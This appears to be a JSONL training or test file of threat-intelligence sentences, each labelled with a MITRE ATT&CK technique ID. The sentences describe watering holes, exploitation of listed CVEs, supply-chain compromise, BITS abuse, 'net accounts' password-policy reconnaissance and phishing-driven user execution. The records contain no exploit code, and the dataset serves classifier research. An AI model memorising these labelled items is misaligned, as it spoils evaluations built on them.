{"text1":"Machete has distributed Machete through a fake blog website.","labels":"['T1189']"}
|
|
{"text1":"Magic Hound has conducted watering-hole attacks through media and magazine websites.","labels":"['T1189']"}
|
|
{"text1":"PLATINUM has sometimes used drive-by attacks against vulnerable browser plugins.","labels":"['T1189']"}
|
|
{"text1":"POORAIM has been delivered through compromised sites acting as watering holes.","labels":"['T1189']"}
|
|
{"text1":"Patchwork has used watering holes to deliver files with exploits to initial victims.","labels":"['T1189']"}
|
|
{"text1":"REvil has infected victim machines through compromised websites and exploit kits.","labels":"['T1189']"}
|
|
{"text1":"Threat Group-3390 has extensively used strategic web compromises to target victims.","labels":"['T1189']"}
|
|
{"text1":"Turla has infected victims using watering holes.","labels":"['T1189']"}
|
|
{"text1":"Windigo has distributed Windows malware via drive-by downloads.","labels":"['T1189']"}
|
|
{"text1":"Windshift has used compromised websites to register custom URL schemes on a remote system.","labels":"['T1189']"}
|
|
{"text1":"APT28 has used a variety of public exploits, including CVE 2020-0688 and CVE 2020-17144, to gain execution on vulnerable Microsoft Exchange; they have also conducted SQL injection attacks against external websites.","labels":"['T1190']"}
|
|
{"text1":"APT29 has exploited CVE-2019-19781 for Citrix, CVE-2019-11510 for Pulse Secure VPNs, CVE-2018-13379 for FortiGate VPNs, and CVE-2019-9670 in Zimbra software to gain access. They have also exploited CVE-2020-0688 against the Microsoft Exchange Control Panel to regain access to a network.","labels":"['T1190']"}
|
|
{"text1":"APT39 has used SQL injection for initial compromise.","labels":"['T1190']"}
|
|
{"text1":"APT41 exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.","labels":"['T1190']"}
|
|
{"text1":"Axiom has been observed using SQL injection to gain access to systems.","labels":"['T1190']"}
|
|
{"text1":"BackdoorDiplomacy has exploited CVE-2020-5902, an F5 BIG-IP vulnerability, to drop a Linux backdoor. BackdoorDiplomacy has also exploited mis-configured Plesk servers.","labels":"['T1190']"}
|
|
{"text1":"BlackTech has exploited a buffer overflow vulnerability in Microsoft Internet Information Services (IIS) 6.0, CVE-2017-7269, in order to establish a new HTTP or command and control (C2) server.","labels":"['T1190']"}
|
|
{"text1":"Dragonfly has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs.","labels":"['T1190']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors exploited multiple vulnerabilities in externally facing servers.","labels":"['T1190']"}
|
|
{"text1":"During Operation Wocao, threat actors gained initial access by exploiting vulnerabilities in JBoss webservers.","labels":"['T1190']"}
|
|
{"text1":"Earth Lusca has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish.","labels":"['T1190']"}
|
|
{"text1":"Fox Kitten has exploited known vulnerabilities in Fortinet, PulseSecure, and Palo Alto VPN appliances.","labels":"['T1190']"}
|
|
{"text1":"HAFNIUM has exploited CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to compromise on-premises versions of Microsoft Exchange Server, enabling access to email accounts and installation of additional malware.","labels":"['T1190']"}
|
|
{"text1":"Havij is used to automate SQL injection.","labels":"['T1190']"}
|
|
{"text1":"Ke3chang has compromised networks by exploiting Internet-facing applications, including vulnerable Microsoft Exchange and SharePoint servers.","labels":"['T1190']"}
|
|
{"text1":"Kimsuky has exploited various vulnerabilities for initial access, including Microsoft Exchange vulnerability CVE-2020-0688.","labels":"['T1190']"}
|
|
{"text1":"Magic Hound has used open-source JNDI exploit kits to exploit Log4j (CVE-2021-44228) and has exploited ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) on MS Exchange servers.","labels":"['T1190']"}
|
|
{"text1":"MuddyWater has exploited the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688).","labels":"['T1190']"}
|
|
{"text1":"Operation Wocao has gained initial access via vulnerable webservers.","labels":"['T1190']"}
|
|
{"text1":"Rocke exploited Apache Struts, Oracle WebLogic (CVE-2017-10271), and Adobe ColdFusion (CVE-2017-3066) vulnerabilities to deliver malware.","labels":"['T1190']"}
|
|
{"text1":"SoreFang can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.","labels":"['T1190']"}
|
|
{"text1":"Threat Group-3390 has exploited the Microsoft SharePoint vulnerability CVE-2019-0604 and CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 in Exchange Server.","labels":"['T1190']"}
|
|
{"text1":"Volatile Cedar has targeted publicly facing web servers, with both automatic and manual vulnerability discovery.","labels":"['T1190']"}
|
|
{"text1":"menuPass has leveraged vulnerabilities in Pulse Secure VPNs to hijack sessions.","labels":"['T1190']"}
|
|
{"text1":"sqlmap can be used to automate exploitation of SQL injection vulnerabilities.","labels":"['T1190']"}
|
|
{"text1":"Elderwood has targeted manufacturers in the supply chain for the defense industry.","labels":"['T1195']"}
|
|
{"text1":"NotPetya's initial infection vector for the June 27, 2017 compromise was a backdoor in the Ukrainian tax accounting software M.E.Doc.","labels":"['T1195']"}
|
|
{"text1":"Smoke Loader was distributed through a compromised update to a Tor client with a coin miner payload.","labels":"['T1195']"}
|
|
{"text1":"XCSSET adds malicious code to a host's Xcode projects by enumerating CocoaPods \"target_integrator.rb\" files under the \"\/Library\/Ruby\/Gems\" folder or enumerates all \".xcodeproj\" folders under a given directory. XCSSET then downloads a script and Mach-O file into the Xcode project folder.","labels":"['T1195.001']"}
|
|
{"text1":"APT29 gained initial network access to some victims via a trojanized update of SolarWinds Orion software.","labels":"['T1195.002']"}
|
|
{"text1":"APT41 gained access to production environments where they could inject malicious code into legitimate, signed files and widely distribute them to end users.","labels":"['T1195.002']"}
|
|
{"text1":"Cobalt Group has compromised legitimate web browser updates to deliver a backdoor.","labels":"['T1195.002']"}
|
|
{"text1":"Dragonfly has placed trojanized installers for control system software on legitimate vendor app stores.","labels":"['T1195.002']"}
|
|
{"text1":"GOLD SOUTHFIELD has distributed ransomware by backdooring software installers via a strategic web compromise of the site hosting Italian WinRAR.","labels":"['T1195.002']"}
|
|
{"text1":"Gelsemium has compromised software supply chains to gain access to victims.","labels":"['T1195.002']"}
|
|
{"text1":"GoldenSpy has been packaged with a legitimate tax preparation software.","labels":"['T1195.002']"}
|
|
{"text1":"SUNSPOT malware was designed and used to insert SUNBURST into software builds of the SolarWinds Orion IT management product.","labels":"['T1195.002']"}
|
|
{"text1":"Sandworm Team has distributed NotPetya by compromising the legitimate Ukrainian accounting software M.E.Doc and replacing a legitimate software update with a malicious one.","labels":"['T1195.002']"}
|
|
{"text1":"Threat Group-3390 has compromised the Able Desktop installer to gain access to victim's environments.","labels":"['T1195.002']"}
|
|
{"text1":"A JPIN variant downloads the backdoor payload via the BITS service.","labels":"['T1197']"}
|
|
{"text1":"APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host.","labels":"['T1197']"}
|
|
{"text1":"BITSAdmin can be used to create BITS Jobs to launch a malicious process.","labels":"['T1197']"}
|
|
{"text1":"Cobalt Strike can download a hosted \"beacon\" payload using BITSAdmin.","labels":"['T1197']"}
|
|
{"text1":"Egregor has used BITSadmin to download and execute malicious DLLs.","labels":"['T1197']"}
|
|
{"text1":"Leviathan has used BITSAdmin to download additional tools.","labels":"['T1197']"}
|
|
{"text1":"MarkiRAT can use BITS Utility to connect with the C2 server.","labels":"['T1197']"}
|
|
{"text1":"Patchwork has used BITS jobs to download malicious payloads.","labels":"['T1197']"}
|
|
{"text1":"ProLock can use BITS jobs to download its malicious payload.","labels":"['T1197']"}
|
|
{"text1":"UBoatRAT takes advantage of the \/SetNotifyCmdLine option in BITSAdmin to ensure it stays running on a system to maintain persistence.","labels":"['T1197']"}
|
|
{"text1":"APT29 has gained access through compromised accounts at cloud solution partners, and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems.","labels":"['T1199']"}
|
|
{"text1":"GOLD SOUTHFIELD has breached Managed Service Providers (MSPs) to deliver malware to MSP customers.","labels":"['T1199']"}
|
|
{"text1":"LAPSUS$ has accessed internet-facing identity providers such as Azure Active Directory and Okta to target specific organizations.","labels":"['T1199']"}
|
|
{"text1":"Once APT28 gained access to the DCCC network, the group then proceeded to use that access to compromise the DNC network.","labels":"['T1199']"}
|
|
{"text1":"POLONIUM has used compromised credentials from an IT company to target downstream customers including a law firm and aviation company.","labels":"['T1199']"}
|
|
{"text1":"Sandworm Team has used dedicated network connections from one victim organization to gain unauthorized access to a separate organization.","labels":"['T1199']"}
|
|
{"text1":"APT34 has used net.exe in a script with \"net accounts \/domain\" to find the password policy of a domain.","labels":"['T1201']"}
|
|
{"text1":"BloodHound can collect password policy information on the target environment.","labels":"['T1201']"}
|
|
{"text1":"During Operation CuckooBees, the threat actors used the `net accounts` command as part of their advanced reconnaissance.","labels":"['T1201']"}
|
|
{"text1":"Kwampirs collects password policy information with the command \"net accounts\".","labels":"['T1201']"}
|
|
{"text1":"OilRig has used net.exe in a script with \"net accounts \/domain\" to find the password policy of a domain.","labels":"['T1201']"}
|
|
{"text1":"The \"net accounts\" and \"net accounts \/domain\" commands with Net can be used to obtain password policy information.","labels":"['T1201']"}
|
|
{"text1":"Turla has used \"net accounts\" and \"net accounts \/domain\" to acquire password policy information.","labels":"['T1201']"}
|
|
{"text1":"Forfiles can be used to subvert controls and possibly conceal command execution by not directly invoking cmd.","labels":"['T1202']"}
|
|
{"text1":"Lazarus Group persistence mechanisms have used \"forfiles.exe\" to execute .htm files.","labels":"['T1202']"}
|
|
{"text1":"APT12 has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities (CVE-2009-3129, CVE-2012-0158) and vulnerabilities in Adobe Reader and Flash (CVE-2009-4324, CVE-2009-0927, CVE-2011-0609, CVE-2011-0611).","labels":"['T1203']"}
|
|
{"text1":"APT28 has exploited Microsoft Office vulnerability CVE-2017-0262 for execution.","labels":"['T1203']"}
|
|
{"text1":"APT29 has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution.","labels":"['T1203']"}
|
|
{"text1":"APT3 has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776.","labels":"['T1203']"}
|
|
{"text1":"APT32 has used an RTF document that includes an exploit (CVE-2017-11882) to execute malicious code.","labels":"['T1203']"}
|
|
{"text1":"APT33 has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774).","labels":"['T1203']"}
|
|
{"text1":"APT37 has used exploits for Flash Player (CVE-2016-4117, CVE-2018-4878), Word (CVE-2017-0199), Internet Explorer (CVE-2020-1380 and CVE-2020-26411), and Microsoft Edge (CVE-2021-26411) for execution.","labels":"['T1203']"}
|
|
{"text1":"APT41 leveraged the following exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.","labels":"['T1203']"}
|
|
{"text1":"Agent Tesla exploits CVE-2017-11882 in Microsoft\u2019s Equation Editor to execute a process.","labels":"['T1203']"}
|
|
{"text1":"Agent Tesla has exploited Office vulnerabilities such as CVE-2017-11882 and CVE-2017-8570 for execution during delivery.","labels":"['T1203']"}
|
|
{"text1":"Aoqin Dragon has exploited CVE-2012-0158 and CVE-2010-3333 for execution against targeted systems.","labels":"['T1203']"}
|
|
{"text1":"Axiom has used exploits for multiple vulnerabilities including CVE-2014-0322, CVE-2012-4792, CVE-2012-1889, and CVE-2013-3893.","labels":"['T1203']"}
|
|
{"text1":"BITTER has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802.","labels":"['T1203']"}
|
|
{"text1":"BRONZE BUTLER has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.","labels":"['T1203']"}
|
|
{"text1":"Bankshot leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims\u2019 machines.","labels":"['T1203']"}
|
|
{"text1":"Cobalt Strike can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.","labels":"['T1203']"}
|
|
{"text1":"Confucius has exploited Microsoft Office vulnerabilities, including CVE-2015-1641, CVE-2017-11882, and CVE-2018-0802.","labels":"['T1203']"}
|
|
{"text1":"Dragonfly has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system.","labels":"['T1203']"}
|
|
{"text1":"During Frankenstein, the threat actors exploited CVE-2017-11882 to execute code on the victim's machine.","labels":"['T1203']"}
|
|
{"text1":"During Operation Dust Storm, the threat actors exploited Adobe Flash vulnerability CVE-2011-0611, Microsoft Windows Help vulnerability CVE-2010-1885, and several Internet Explorer vulnerabilities, including CVE-2011-1255, CVE-2012-1889, and CVE-2014-0322.","labels":"['T1203']"}
|
|
{"text1":"EXOTIC LILY has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML.","labels":"['T1203']"}
|
|
{"text1":"Elderwood has used exploitation of endpoint software, including Microsoft Internet Explorer and Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits.","labels":"['T1203']"}
|
|
{"text1":"Ember Bear has exploited Microsoft Office vulnerability CVE-2017-11882.","labels":"['T1203']"}
|
|
{"text1":"EvilBunny has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader.","labels":"['T1203']"}
|
|
{"text1":"Inception has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.","labels":"['T1203']"}
|
|
{"text1":"InvisiMole has installed legitimate but vulnerable Total Video Player software and wdigest.dll library drivers on compromised hosts to exploit stack overflow and input validation vulnerabilities for code execution.","labels":"['T1203']"}
|
|
{"text1":"KeyBoy exploits the vulnerability CVE-2012-0158 for execution.","labels":"['T1203']"}
|
|
{"text1":"Lazarus Group has exploited Adobe Flash vulnerability CVE-2018-4878 for execution.","labels":"['T1203']"}
|
|
{"text1":"Leviathan has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.","labels":"['T1203']"}
|
|
{"text1":"MuddyWater has exploited the Office vulnerability CVE-2017-0199 for execution.","labels":"['T1203']"}
|
|
{"text1":"Patchwork uses malicious documents to deliver remote execution exploits as part of. The group has previously exploited CVE-2017-8570, CVE-2012-1856, CVE-2014-4114, CVE-2017-0199, CVE-2017-11882, and CVE-2015-1641.","labels":"['T1203']"}
|
|
{"text1":"Ramsay has been embedded in documents exploiting CVE-2017-0199, CVE-2017-11882, and CVE-2017-8570.","labels":"['T1203']"}
|
|
{"text1":"SUPERNOVA was installed via exploitation of a SolarWinds Orion API authentication bypass vulnerability (CVE-2020-10148).","labels":"['T1203']"}
|
|
{"text1":"Sandworm Team has exploited vulnerabilities in Microsoft PowerPoint via OLE objects (CVE-2014-4114) and Microsoft Word via crafted TIFF images (CVE-2013-3906).","labels":"['T1203']"}
|
|
{"text1":"SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3\/4\/5\/6, and the Hadoop YARN ResourceManager.","labels":"['T1203']"}
|
|
{"text1":"The White Company has taken advantage of a known vulnerability in Microsoft Word (CVE 2012-0158) to execute code.","labels":"['T1203']"}
|
|
{"text1":"Threat Group-3390 has exploited CVE-2018-0798 in Equation Editor.","labels":"['T1203']"}
|
|
{"text1":"Tonto Team has exploited Microsoft vulnerabilities, including CVE-2018-0798, CVE-2018-8174, CVE-2018-0802, CVE-2017-11882, CVE-2019-9489, CVE-2020-8468, and CVE-2018-0798 to enable execution of their delivered malicious payloads.","labels":"['T1203']"}
|
|
{"text1":"Transparent Tribe has crafted malicious files to exploit CVE-2012-0158 and CVE-2010-3333 for execution.","labels":"['T1203']"}
|
|
{"text1":"Tropic Trooper has executed commands through Microsoft security vulnerabilities, including CVE-2017-11882, CVE-2018-0802, and CVE-2012-0158.","labels":"['T1203']"}
|
|
{"text1":"admin@338 has exploited client software vulnerabilities for execution, such as Microsoft Word CVE-2012-0158.","labels":"['T1203']"}
|
|
{"text1":"LAPSUS$ has recruited target organization employees or contractors who provide credentials and approve an associated MFA prompt, or install remote management software onto a corporate workstation, allowing LAPSUS$ to take control of an authenticated system.","labels":"['T1204']"}
|
|
{"text1":"Magic Hound has attempted to get users to execute malware via social media and spearphishing emails.","labels":"['T1204']"}
|
|
{"text1":"APT29 has used various forms of spearphishing attempting to get a user to click on a malicious link.","labels":"['T1204.001']"}
|
|
{"text1":"APT32 has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.","labels":"['T1204.001']"}
|
|
{"text1":"APT33 has lured users to click links to malicious HTML applications delivered via spearphishing emails.","labels":"['T1204.001']"}
|
|
{"text1":"APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious link.","labels":"['T1204.001']"}
|
|
{"text1":"Bazar can gain execution after a user clicks on a malicious link to decoy landing pages hosted on Google Docs.","labels":"['T1204.001']"}
|
|
{"text1":"Cobalt Group has sent emails containing malicious links that require users to execute a file or macro to infect the victim machine.","labels":"['T1204.001']"}
|
|
{"text1":"Dragonfly 2.0 has used various forms of spearphishing in attempts to get users to open links.","labels":"['T1204.001']"}
|
|
{"text1":"During Night Dragon, threat actors enticed users to click on links in spearphishing emails to download malware.","labels":"['T1204.001']"}
|
|
{"text1":"During Operation Spalax, the threat actors relied on a victim to click on a malicious link distributed via phishing emails.","labels":"['T1204.001']"}
|
|
{"text1":"EXOTIC LILY has used malicious links to lure users into executing malicious payloads.","labels":"['T1204.001']"}
|
|
{"text1":"Earth Lusca has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.","labels":"['T1204.001']"}
|
|
{"text1":"Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open links.","labels":"['T1204.001']"}
|
|
{"text1":"FIN4 has lured victims to click malicious links delivered via spearphishing emails (often sent from compromised accounts).","labels":"['T1204.001']"}
|
|
{"text1":"FIN7 has used malicious links to lure victims into downloading malware.","labels":"['T1204.001']"}
|
|
{"text1":"Grandoreiro has used malicious links to gain execution on victim machines.","labels":"['T1204.001']"}
|
|
{"text1":"Hancitor has relied upon users clicking on a malicious link delivered through phishing.","labels":"['T1204.001']"}
|
|
{"text1":"Javali has achieved execution through victims clicking links to malicious websites.","labels":"['T1204.001']"}
|
|
{"text1":"KOCTOPUS has relied on victims clicking on a malicious link delivered via email.","labels":"['T1204.001']"}
|
|
{"text1":"Kerrdown has gained execution through victims opening malicious links.","labels":"['T1204.001']"}
|
|
{"text1":"Kimsuky has lured victims into clicking malicious links.","labels":"['T1204.001']"}
|
|
{"text1":"Lazarus Group has sent spearphishing emails in an attempt to lure users to click on a malicious link.","labels":"['T1204.001']"}
|
|
{"text1":"LazyScripter has relied upon users clicking on links to malicious files.","labels":"['T1204.001']"}
|
|
{"text1":"Leviathan has sent spearphishing email links attempting to get a user to click.","labels":"['T1204.001']"}
|
|
{"text1":"Magic Hound has attempted to lure victims into opening malicious links embedded in emails.","labels":"['T1204.001']"}
|
|
{"text1":"Melcoz has gained execution through victims opening malicious links.","labels":"['T1204.001']"}
|
|
{"text1":"Mofang's spearphishing emails required a user to click the link to connect to a compromised website.","labels":"['T1204.001']"}
|
|
{"text1":"MuddyWater has distributed URLs in phishing e-mails that link to lure documents.","labels":"['T1204.001']"}
|
|
{"text1":"Mustang Panda has sent malicious links including links directing victims to a Google Drive folder.","labels":"['T1204.001']"}
|
|
{"text1":"NETWIRE has been executed through convincing victims into clicking malicious links.","labels":"['T1204.001']"}
|
|
{"text1":"ObliqueRAT has gained execution on targeted systems through luring users to click on links to malicious URLs.","labels":"['T1204.001']"}
|
|
{"text1":"OilRig has delivered malicious links to achieve execution on the target system.","labels":"['T1204.001']"}
|
|
{"text1":"OutSteel has relied on a user to click a malicious link within a spearphishing email.","labels":"['T1204.001']"}
|
|
{"text1":"PLEAD has been executed via malicious links in e-mails.","labels":"['T1204.001']"}
|
|
{"text1":"QakBot has gained execution through users opening malicious links.","labels":"['T1204.001']"}
|
|
{"text1":"SMOKEDHAM has relied upon users clicking on a malicious link delivered through phishing.","labels":"['T1204.001']"}
|
|
{"text1":"Sandworm Team has tricked unwitting recipients into clicking on malicious hyperlinks within emails crafted to resemble trustworthy senders.","labels":"['T1204.001']"}
|
|
{"text1":"Sidewinder has lured targets to click on malicious links to gain execution in the target environment.","labels":"['T1204.001']"}
|
|
{"text1":"SpicyOmelette has been executed through malicious links within spearphishing emails.","labels":"['T1204.001']"}
|
|
{"text1":"Squirrelwaffle has relied on victims to click on a malicious link sent via phishing campaigns.","labels":"['T1204.001']"}
|
|
{"text1":"TSCookie has been executed via malicious links embedded in e-mails spoofing the Ministries of Education, Culture, Sports, Science and Technology of Japan.","labels":"['T1204.001']"}
|
|
{"text1":"Transparent Tribe has directed users to open URLs hosting malicious content.","labels":"['T1204.001']"}
|
|
{"text1":"Turla has used spearphishing via a link to get users to download and run their malware.","labels":"['T1204.001']"}
|
|
{"text1":"Windshift has used links embedded in e-mails to lure victims into executing malicious code.","labels":"['T1204.001']"}
|
|
{"text1":"Wizard Spider has lured victims into clicking a malicious link delivered through spearphishing.","labels":"['T1204.001']"}
|
|
{"text1":"ZIRCONIUM has used malicious links in e-mails to lure victims into downloading malware.","labels":"['T1204.001']"}
|
|
{"text1":"A Word document delivering TYPEFRAME prompts the user to enable macro execution.","labels":"['T1204.002']"}
|
|
{"text1":"APT-C-36 has prompted victims to accept macros in order to execute the subsequent payload.","labels":"['T1204.002']"}
|
|
{"text1":"APT28 attempted to get users to click on Microsoft Office attachments containing malicious macro scripts.","labels":"['T1204.002']"}
|
|
{"text1":"APT29 has used various forms of spearphishing attempting to get a user to open attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files.","labels":"['T1204.002']"}
|
|
{"text1":"APT30 has relied on users to execute malicious file attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
|
|
{"text1":"APT32 has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.","labels":"['T1204.002']"}
|
|
{"text1":"APT37 has sent spearphishing attachments attempting to get a user to open them.","labels":"['T1204.002']"}
|
|
{"text1":"APT39 has sent spearphishing emails in an attempt to lure users to click on a malicious attachment.","labels":"['T1204.002']"}
|
|
{"text1":"Ajax Security Team has lured victims into executing malicious files.","labels":"['T1204.002']"}
|
|
{"text1":"Aoqin Dragon has lured victims into opening weaponized documents, fake external drives, and fake antivirus to execute malicious payloads.","labels":"['T1204.002']"}
|
|
{"text1":"AppleJeus has required user execution of a malicious MSI installer.","labels":"['T1204.002']"}
|
|
{"text1":"AppleSeed can achieve execution through users running malicious file attachments distributed via email.","labels":"['T1204.002']"}
|
|
{"text1":"Astaroth has used malicious files including VBS, LNK, and HTML for execution.","labels":"['T1204.002']"}
|
|
{"text1":"BITTER has attempted to lure victims into opening malicious attachments delivered via spearphishing.","labels":"['T1204.002']"}
|
|
{"text1":"BLINDINGCAN has lured victims into executing malicious macros embedded within Microsoft Office documents.","labels":"['T1204.002']"}
|
|
{"text1":"BRONZE BUTLER has attempted to get users to launch malicious Microsoft Word attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
|
|
{"text1":"Bad Rabbit has been executed through user installation of an executable disguised as a flash installer.","labels":"['T1204.002']"}
|
|
{"text1":"Bisonal has relied on users to execute malicious file attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
|
|
{"text1":"BlackTech has used e-mails with malicious documents to lure victims into installing malware.","labels":"['T1204.002']"}
|
|
{"text1":"BoomBox has gained execution through user interaction with a malicious file.","labels":"['T1204.002']"}
|
|
{"text1":"Bumblebee has relied upon a user opening an ISO file to enable execution of malicious shortcut files and DLLs.","labels":"['T1204.002']"}
|
|
{"text1":"Bundlore has attempted to get users to execute a malicious .app file that looks like a Flash Player update.","labels":"['T1204.002']"}
|
|
{"text1":"CARROTBALL has been executed through users being lured into opening malicious e-mail attachments.","labels":"['T1204.002']"}
|
|
{"text1":"CSPY Downloader has been delivered via malicious documents with embedded macros.","labels":"['T1204.002']"}
|
|
{"text1":"Clambling has gained execution through luring victims into opening malicious files.","labels":"['T1204.002']"}
|
|
{"text1":"Cobalt Group has sent emails containing malicious attachments that require users to execute a file or macro to infect the victim machine.","labels":"['T1204.002']"}
|
|
{"text1":"DanBot has relied on victims' opening a malicious file for initial execution.","labels":"['T1204.002']"}
|
|
{"text1":"Dark Caracal makes their malware look like Flash Player, Office, or PDF documents in order to entice a user to click on it.","labels":"['T1204.002']"}
|
|
{"text1":"DnsSystem has lured victims into opening macro-enabled Word documents for execution.","labels":"['T1204.002']"}
|
|
{"text1":"Dragonfly has used various forms of spearphishing in attempts to get users to open malicious attachments.","labels":"['T1204.002']"}
|
|
{"text1":"During C0011, Transparent Tribe relied on a student target to open a malicious document delivered via email.","labels":"['T1204.002']"}
|
|
{"text1":"During Operation Dust Storm, the threat actors relied on potential victims to open a malicious Microsoft Word document sent via email.","labels":"['T1204.002']"}
|
|
{"text1":"During Operation Sharpshooter, the threat actors relied on victims executing malicious Microsoft Word or PDF files.","labels":"['T1204.002']"}
|
|
{"text1":"During Operation Spalax, the threat actors relied on a victim to open a PDF document and click on an embedded malicious link to download malware.","labels":"['T1204.002']"}
|
|
{"text1":"EXOTIC LILY has gained execution through victims clicking on malicious LNK files contained within ISO files, which can execute hidden DLLs within the ISO.","labels":"['T1204.002']"}
|
|
{"text1":"Earth Lusca required users to click on a malicious file for the loader to activate.","labels":"['T1204.002']"}
|
|
{"text1":"Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open attachments.","labels":"['T1204.002']"}
|
|
{"text1":"Ember Bear has attempted to lure victims into executing malicious files.","labels":"['T1204.002']"}
|
|
{"text1":"Emotet has relied upon users clicking on a malicious attachment delivered through spearphishing.","labels":"['T1204.002']"}
|
|
{"text1":"FIN4 has lured victims to launch malicious attachments delivered via spearphishing emails (often sent from compromised accounts).","labels":"['T1204.002']"}
|
|
{"text1":"FIN7 lured victims to double-click on images in the attachments they sent which would then execute the hidden LNK file.","labels":"['T1204.002']"}
|
|
{"text1":"FIN8 has used malicious e-mail attachments to lure victims into executing malware.","labels":"['T1204.002']"}
|
|
{"text1":"Ferocious Kitten has attempted to convince victims to enable malicious content within a spearphishing email by including an odd decoy message.","labels":"['T1204.002']"}
|
|
{"text1":"Frankenstein has used trojanized Microsoft Word documents sent via email, which prompted the victim to enable macros.","labels":"['T1204.002']"}
|
|
{"text1":"Gallmaker sent victims a lure document with a warning that asked victims to \u201cenable content\u201d for execution.","labels":"['T1204.002']"}
|
|
{"text1":"Gamaredon Group has attempted to get users to click on Office attachments with malicious macros embedded.","labels":"['T1204.002']"}
|
|
{"text1":"Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails.","labels":"['T1204.002']"}
|
|
{"text1":"Grandoreiro has infected victims via malicious attachments.","labels":"['T1204.002']"}
|
|
{"text1":"IcedID has been executed through Word documents with malicious embedded macros.","labels":"['T1204.002']"}
|
|
{"text1":"InvisiMole can deliver trojanized versions of software and documents, relying on user execution.","labels":"['T1204.002']"}
|
|
{"text1":"JCry has achieved execution by luring users to click on a file that appeared to be an Adobe Flash Player update installer.","labels":"['T1204.002']"}
|
|
{"text1":"Javali has achieved execution through victims opening malicious attachments, including MSI files with embedded VBScript.","labels":"['T1204.002']"}
|
|
{"text1":"KONNI has relied on a victim to enable malicious macros within an attachment delivered via email.","labels":"['T1204.002']"}
|
|
{"text1":"Kerrdown has gained execution through victims opening malicious files.","labels":"['T1204.002']"}
|
|
{"text1":"Kimsuky has attempted to lure victims into opening malicious e-mail attachments.","labels":"['T1204.002']"}
|
|
{"text1":"Leviathan has sent spearphishing attachments attempting to get a user to click.","labels":"['T1204.002']"}
|
|
{"text1":"Lokibot has tricked recipients into enabling malicious macros by getting victims to click \"enable content\" in email attachments.","labels":"['T1204.002']"}
|
|
{"text1":"Magic Hound has attempted to lure victims into opening malicious email attachments.","labels":"['T1204.002']"}
|
|
{"text1":"Magic Hound has lured victims into executing malicious files.","labels":"['T1204.002']"}
|
|
{"text1":"Metamorfo requires the user to double-click the executable to run the malicious HTA file or to download a malicious installer.","labels":"['T1204.002']"}
|
|
{"text1":"Mofang's malicious spearphishing attachments required a user to open the file after receiving it.","labels":"['T1204.002']"}
|
|
{"text1":"Molerats has sent malicious files via email that tricked users into clicking Enable Content to run an embedded macro and to download malicious archives.","labels":"['T1204.002']"}
|
|
{"text1":"Mongall has relied on a user opening a malicious document for execution.","labels":"['T1204.002']"}
|
|
{"text1":"MuddyWater has attempted to get users to enable macros and launch malicious Microsoft Word documents delivered via spearphishing emails.","labels":"['T1204.002']"}
|
|
{"text1":"Mustang Panda has sent malicious files requiring direct victim interaction to execute.","labels":"['T1204.002']"}
|
|
{"text1":"NETWIRE has been executed through luring victims into opening malicious documents.","labels":"['T1204.002']"}
|
|
{"text1":"Naikon has convinced victims to open malicious attachments to execute malware.","labels":"['T1204.002']"}
|
|
{"text1":"NativeZone can display an RTF document to the user to enable execution of Cobalt Strike stage shellcode.","labels":"['T1204.002']"}
|
|
{"text1":"OSX\/Shlayer has relied on users mounting and executing a malicious DMG file.","labels":"['T1204.002']"}
|
|
{"text1":"OilRig has delivered macro-enabled documents that required targets to click the \"enable content\" button to execute the payload on the system.","labels":"['T1204.002']"}
|
|
{"text1":"OutSteel has relied on a user to execute a malicious attachment delivered via spearphishing.","labels":"['T1204.002']"}
|
|
{"text1":"PLATINUM has attempted to get users to open malicious files by sending spearphishing emails with attachments to victims.","labels":"['T1204.002']"}
|
|
